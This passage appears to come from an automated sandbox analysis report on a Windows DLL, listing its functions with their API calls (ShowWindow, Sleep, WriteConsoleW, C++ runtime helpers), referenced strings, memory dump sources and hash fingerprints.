                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,6E67CB50,00000000,00000001,00000000,00000000,?,6E675E59,00000000,?,00000000,00000000), ref: 6E67E623
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2744216297-0
                                                                                                                                                    • Opcode ID: aa0cebb1fc6b5bb5dc4ef59f405fbbbdffa104a3e063c9c4f3b72fd5732cc87d
                                                                                                                                                    • Instruction ID: 1b6d33ae23c59ca97331d2835d6807c683c3d84a9cdb821b953fccf23f7efe4a
                                                                                                                                                    • Opcode Fuzzy Hash: aa0cebb1fc6b5bb5dc4ef59f405fbbbdffa104a3e063c9c4f3b72fd5732cc87d
                                                                                                                                                    • Instruction Fuzzy Hash: A1F0303655451EBBCF322FE2CC049CA3F2AFF0A7A0F014114FA1D95220DB728824ABD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6365F0, Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ShowWindow.USER32(00000000,00000000,00000000,?,6E64CBB8,00000000,00000000,3920FDCC,?,?,?,?,?,?,?,00000000), ref: 6E6365FF
                                                                                                                                                    • ShowWindow.USER32(8DFFFFFF,00000000,?,6E64CBB8,00000000,00000000,3920FDCC,?,?,?,?,?,?,?,00000000,6E68341D), ref: 6E63660E
                                                                                                                                                    • ShowWindow.USER32(F9E8CC4D,00000000,?,6E64CBB8,00000000,00000000,3920FDCC,?,?,?,?,?,?,?,00000000,6E68341D), ref: 6E63661D
                                                                                                                                                    • ShowWindow.USER32(8BFFFFE7,00000000,?,6E64CBB8,00000000,00000000,3920FDCC,?,?,?,?,?,?,?,00000000,6E68341D), ref: 6E63662C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ShowWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1268545403-0
                                                                                                                                                    • Opcode ID: 2e0fb1ff43403dfeea56c2679b1b76b0cf5eba93c9d37b7e68af082d46b86b80
                                                                                                                                                    • Instruction ID: d7eea18337de73d621a7021eb4f293f7bc181e44caf57d29fabb685b176c9558
                                                                                                                                                    • Opcode Fuzzy Hash: 2e0fb1ff43403dfeea56c2679b1b76b0cf5eba93c9d37b7e68af082d46b86b80
                                                                                                                                                    • Instruction Fuzzy Hash: 09F09E79650204FBDB04DB95CA5AF5AB7B9FB4A701F104188F60A5B391C672AD00DB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6707E6, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 263COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __aulldvrm
                                                                                                                                                    • String ID: +$-
                                                                                                                                                    • API String ID: 1302938615-2137968064
                                                                                                                                                    • Opcode ID: 0a6efb37764a9c3643b7099452c14860232f03b5f780ddd0b30a76e3fb49037b
                                                                                                                                                    • Instruction ID: 8fbffc86ce9fe0e980c7950107bcd447d38e6558401a688fba1f115d55685713
                                                                                                                                                    • Opcode Fuzzy Hash: 0a6efb37764a9c3643b7099452c14860232f03b5f780ddd0b30a76e3fb49037b
                                                                                                                                                    • Instruction Fuzzy Hash: 0D91E730D441499EEFA0CEE9C4606EDBBB4EF47324F149656E8B4A7291F3718941CB71
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E646BF0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E6421C0: _Min_value.LIBCPMTD ref: 6E6421ED
                                                                                                                                                    • allocator.LIBCONCRTD ref: 6E646C8E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Min_valueallocator
                                                                                                                                                    • String ID: W0dn$W0dn
                                                                                                                                                    • API String ID: 2162267568-3583759363
                                                                                                                                                    • Opcode ID: 003d956fc4ba9e27e5407568f8fa9138cc106819767f397aa54509f4f774a853
                                                                                                                                                    • Instruction ID: 8740336087c6ba9a1abf79d225e8f5a11ef0c522288fd73316c7bc94500aaaec
                                                                                                                                                    • Opcode Fuzzy Hash: 003d956fc4ba9e27e5407568f8fa9138cc106819767f397aa54509f4f774a853
                                                                                                                                                    • Instruction Fuzzy Hash: 065190B5E00109EFDB08DFD8D9909EEB7B9FF88314F208629E519A7350D731A901CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6474D0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E6421C0: _Min_value.LIBCPMTD ref: 6E6421ED
                                                                                                                                                    • allocator.LIBCONCRTD ref: 6E64756E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Min_valueallocator
                                                                                                                                                    • String ID: '7dn$'7dn
                                                                                                                                                    • API String ID: 2162267568-1099802838
                                                                                                                                                    • Opcode ID: 7643f6a2fd3414469464fd6bc655c5483df0f21b3f060c42bbc06a9268bb96ca
                                                                                                                                                    • Instruction ID: d08cbe100da57850a14cf13ca497d7f36ec06155fcbc6169f078379bff310072
                                                                                                                                                    • Opcode Fuzzy Hash: 7643f6a2fd3414469464fd6bc655c5483df0f21b3f060c42bbc06a9268bb96ca
                                                                                                                                                    • Instruction Fuzzy Hash: 155192B5E00109DFDB08DFD8D9909EEB7B9FF88314F208529E519A7390DB30A901CBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6472C0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E6421C0: _Min_value.LIBCPMTD ref: 6E6421ED
                                                                                                                                                    • allocator.LIBCONCRTD ref: 6E64735E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Min_valueallocator
                                                                                                                                                    • String ID: g5dn$g5dn
                                                                                                                                                    • API String ID: 2162267568-1168777471
                                                                                                                                                    • Opcode ID: 4bc7f6e5e9e80016f08f3d41ecad332f7e7b7a3aea013d138b0523c9fb0ce2d6
                                                                                                                                                    • Instruction ID: 6a563f1b8927c780cab7ed3d22a0027eb17e534fefc8db64ccaf279829f6bdde
                                                                                                                                                    • Opcode Fuzzy Hash: 4bc7f6e5e9e80016f08f3d41ecad332f7e7b7a3aea013d138b0523c9fb0ce2d6
                                                                                                                                                    • Instruction Fuzzy Hash: 385182B5E00119DFDB08DFD8D9909EEB7B9FB88314F208529E519B7350D731A901CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E64CA50, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120memorysleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E64CA84
                                                                                                                                                      • Part of subcall function 6E64C980: std::ios_base::good.LIBCPMTD ref: 6E64C99A
                                                                                                                                                      • Part of subcall function 6E64DA00: _DebugHeapAllocator.LIBCPMTD ref: 6E64DA1E
                                                                                                                                                    • Sleep.KERNEL32(000000AA,?,?,?,?,?,?,?,?,?,?,?,?,00000000,6E68341D,000000FF), ref: 6E64CB69
                                                                                                                                                      • Part of subcall function 6E6365F0: ShowWindow.USER32(00000000,00000000,00000000,?,6E64CBB8,00000000,00000000,3920FDCC,?,?,?,?,?,?,?,00000000), ref: 6E6365FF
                                                                                                                                                      • Part of subcall function 6E6365F0: ShowWindow.USER32(8DFFFFFF,00000000,?,6E64CBB8,00000000,00000000,3920FDCC,?,?,?,?,?,?,?,00000000,6E68341D), ref: 6E63660E
                                                                                                                                                      • Part of subcall function 6E6365F0: ShowWindow.USER32(F9E8CC4D,00000000,?,6E64CBB8,00000000,00000000,3920FDCC,?,?,?,?,?,?,?,00000000,6E68341D), ref: 6E63661D
                                                                                                                                                      • Part of subcall function 6E6365F0: ShowWindow.USER32(8BFFFFE7,00000000,?,6E64CBB8,00000000,00000000,3920FDCC,?,?,?,?,?,?,?,00000000,6E68341D), ref: 6E63662C
                                                                                                                                                    Strings
                                                                                                                                                    • Element Path not found: , xrefs: 6E64CAD1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ShowWindow$AllocatorDebugHeap$Sleepstd::ios_base::good
                                                                                                                                                    • String ID: Element Path not found:
                                                                                                                                                    • API String ID: 985659293-4021771638
                                                                                                                                                    • Opcode ID: 82918faf28f4fe7e9ebef3b2956919be98b3305f7a6b4c63ac08bd4e221691a3
                                                                                                                                                    • Instruction ID: 107bd5f0025175efc79579033e41a7d418afa2bcf806be1ef5ba1515ec5cea80
                                                                                                                                                    • Opcode Fuzzy Hash: 82918faf28f4fe7e9ebef3b2956919be98b3305f7a6b4c63ac08bd4e221691a3
                                                                                                                                                    • Instruction Fuzzy Hash: E3413C70A10209EFDB04DFE4D950BEEB7B9BF45314F208629E416AB385DB34A944CB95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6405F0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E6418A0: std::ios_base::good.LIBCPMTD ref: 6E6418AC
                                                                                                                                                      • Part of subcall function 6E6418A0: Concurrency::cancel_current_task.LIBCPMT ref: 6E6418B8
                                                                                                                                                      • Part of subcall function 6E637200: task.LIBCPMTD ref: 6E63727F
                                                                                                                                                      • Part of subcall function 6E637200: task.LIBCPMTD ref: 6E63728B
                                                                                                                                                      • Part of subcall function 6E637200: Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E6372A0
                                                                                                                                                      • Part of subcall function 6E637200: task.LIBCPMTD ref: 6E6372B8
                                                                                                                                                      • Part of subcall function 6E662DFE: KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,?,?,?,8007000E), ref: 6E662E5E
                                                                                                                                                    • task.LIBCPMTD ref: 6E640717
                                                                                                                                                    • task.LIBCPMTD ref: 6E640726
                                                                                                                                                    Strings
                                                                                                                                                    • excessive object size: , xrefs: 6E6406CF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: task$Concurrency::cancel_current_taskConcurrency::scheduler_worker_creation_error::scheduler_worker_creation_errorDispatcherExceptionUserstd::ios_base::good
                                                                                                                                                    • String ID: excessive object size:
                                                                                                                                                    • API String ID: 276634084-3718820671
                                                                                                                                                    • Opcode ID: 22b41d504ac11e31d64b7d0888cefab02012c2bed9e5830af3c7e923d1ef2364
                                                                                                                                                    • Instruction ID: 8cbe476432586c921d690dcdd248b39217a163dc303fd5a13a25690e890d6059
                                                                                                                                                    • Opcode Fuzzy Hash: 22b41d504ac11e31d64b7d0888cefab02012c2bed9e5830af3c7e923d1ef2364
                                                                                                                                                    • Instruction Fuzzy Hash: E4415B71D00108EFDB14CFE8C890BEEBBB9AF44348F14852DE5126B381EB346A15CB69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E640230, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E6418A0: std::ios_base::good.LIBCPMTD ref: 6E6418AC
                                                                                                                                                      • Part of subcall function 6E6418A0: Concurrency::cancel_current_task.LIBCPMT ref: 6E6418B8
                                                                                                                                                      • Part of subcall function 6E637200: task.LIBCPMTD ref: 6E63727F
                                                                                                                                                      • Part of subcall function 6E637200: task.LIBCPMTD ref: 6E63728B
                                                                                                                                                      • Part of subcall function 6E637200: Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E6372A0
                                                                                                                                                      • Part of subcall function 6E637200: task.LIBCPMTD ref: 6E6372B8
                                                                                                                                                      • Part of subcall function 6E662DFE: KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,?,?,?,8007000E), ref: 6E662E5E
                                                                                                                                                    • task.LIBCPMTD ref: 6E640357
                                                                                                                                                    • task.LIBCPMTD ref: 6E640366
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: task$Concurrency::cancel_current_taskConcurrency::scheduler_worker_creation_error::scheduler_worker_creation_errorDispatcherExceptionUserstd::ios_base::good
                                                                                                                                                    • String ID: excessive array size:
                                                                                                                                                    • API String ID: 276634084-2345381964
                                                                                                                                                    • Opcode ID: 56280fd45e3114f62df60597cb548243b2cf93dfc3c23be0346f4fcd5f03129d
                                                                                                                                                    • Instruction ID: caa4a831d9c3eeef5bcd4525f55523a477b373ce85f552e96819493543164df7
                                                                                                                                                    • Opcode Fuzzy Hash: 56280fd45e3114f62df60597cb548243b2cf93dfc3c23be0346f4fcd5f03129d
                                                                                                                                                    • Instruction Fuzzy Hash: 6B412B71D00248EFDB14CFE8C850BEEBBB9AF54348F14852DE516AB381DB346A15CB69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6216F0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _fwprintf.LIBCONCRTD ref: 6E621779
                                                                                                                                                    • _fwprintf.LIBCONCRTD ref: 6E6217C2
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _fwprintf$Base::Concurrency::details::ContextIdentityQueueWork
                                                                                                                                                    • String ID: %d.%d.%d.%d
                                                                                                                                                    • API String ID: 3002235032-3491811756
                                                                                                                                                    • Opcode ID: a61561541b5bb9fe28567304bccde225f3396a5735d5a27abc1ccf734226b4ce
                                                                                                                                                    • Instruction ID: bb6fb1206c1ee9a1290a4e91a53b48dbbaab6cc4075143a7a627f492bf2ed76d
                                                                                                                                                    • Opcode Fuzzy Hash: a61561541b5bb9fe28567304bccde225f3396a5735d5a27abc1ccf734226b4ce
                                                                                                                                                    • Instruction Fuzzy Hash: 6141527090010C9FDB04CFD8D594BEE7BB9EF48314F908538D915AB284DB79AA49CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E630860, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E630894
                                                                                                                                                      • Part of subcall function 6E625C30: _DebugHeapAllocator.LIBCPMTD ref: 6E625C67
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E630939
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$Base::Concurrency::details::ContextIdentityQueueWork
                                                                                                                                                    • String ID: %s\%s
                                                                                                                                                    • API String ID: 1698587239-4073750446
                                                                                                                                                    • Opcode ID: 6dbfe236d6bf1fefa233d28132fe7f4adf509ebefc6476f094c7e20b130450d6
                                                                                                                                                    • Instruction ID: 186512378eb03d4f8fa1ec92aee0a49ceb4f770a9ccf264eabd62677b738f700
                                                                                                                                                    • Opcode Fuzzy Hash: 6dbfe236d6bf1fefa233d28132fe7f4adf509ebefc6476f094c7e20b130450d6
                                                                                                                                                    • Instruction Fuzzy Hash: 45413B70910149EFDB04DFA4C950BEE7B7CAF10358F504A68E8126B2D4EB746A04CF9A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E63FE30, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E637200: task.LIBCPMTD ref: 6E63727F
                                                                                                                                                      • Part of subcall function 6E637200: task.LIBCPMTD ref: 6E63728B
                                                                                                                                                      • Part of subcall function 6E637200: Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E6372A0
                                                                                                                                                      • Part of subcall function 6E637200: task.LIBCPMTD ref: 6E6372B8
                                                                                                                                                      • Part of subcall function 6E662DFE: KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,?,?,?,8007000E), ref: 6E662E5E
                                                                                                                                                    • task.LIBCPMTD ref: 6E63FF0E
                                                                                                                                                    • task.LIBCPMTD ref: 6E63FF1D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_errorDispatcherExceptionUser
                                                                                                                                                    • String ID: excessive array size:
                                                                                                                                                    • API String ID: 865528258-2345381964
                                                                                                                                                    • Opcode ID: afad85c1bd6f7e42b0ce78c4e8380029d2d51c1883fcfb3142c7405a30b83d84
                                                                                                                                                    • Instruction ID: 02c53a32f530a5a6d6d4888190be1a25f88f70806e570d47765a33e13c6d9662
                                                                                                                                                    • Opcode Fuzzy Hash: afad85c1bd6f7e42b0ce78c4e8380029d2d51c1883fcfb3142c7405a30b83d84
                                                                                                                                                    • Instruction Fuzzy Hash: 4D314D71D0424CEFDB14CFE4D850ADEBBB8AF44318F14852DE416AB381EB306A09CB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E63FF70, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E637200: task.LIBCPMTD ref: 6E63727F
                                                                                                                                                      • Part of subcall function 6E637200: task.LIBCPMTD ref: 6E63728B
                                                                                                                                                      • Part of subcall function 6E637200: Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E6372A0
                                                                                                                                                      • Part of subcall function 6E637200: task.LIBCPMTD ref: 6E6372B8
                                                                                                                                                      • Part of subcall function 6E662DFE: KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,?,?,?,8007000E), ref: 6E662E5E
                                                                                                                                                    • task.LIBCPMTD ref: 6E64004E
                                                                                                                                                    • task.LIBCPMTD ref: 6E64005D
                                                                                                                                                    Strings
                                                                                                                                                    • excessive object size: , xrefs: 6E640006
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_errorDispatcherExceptionUser
                                                                                                                                                    • String ID: excessive object size:
                                                                                                                                                    • API String ID: 865528258-3718820671
                                                                                                                                                    • Opcode ID: 2aaacfbe3c223cc660decb451b49504d87c42a73b3947e8d1faafd664bfc6071
                                                                                                                                                    • Instruction ID: e00c76555a6ecdd9da19558e7df3b1b11077062396b863b6e30749b3c74d2f3f
                                                                                                                                                    • Opcode Fuzzy Hash: 2aaacfbe3c223cc660decb451b49504d87c42a73b3947e8d1faafd664bfc6071
                                                                                                                                                    • Instruction Fuzzy Hash: 56317E71C00248EFDB14CFE4D850ADEBBB8EF54708F10852DD412AB381EB306A49CB65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E64FF60, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E64FFF6
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E650030
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
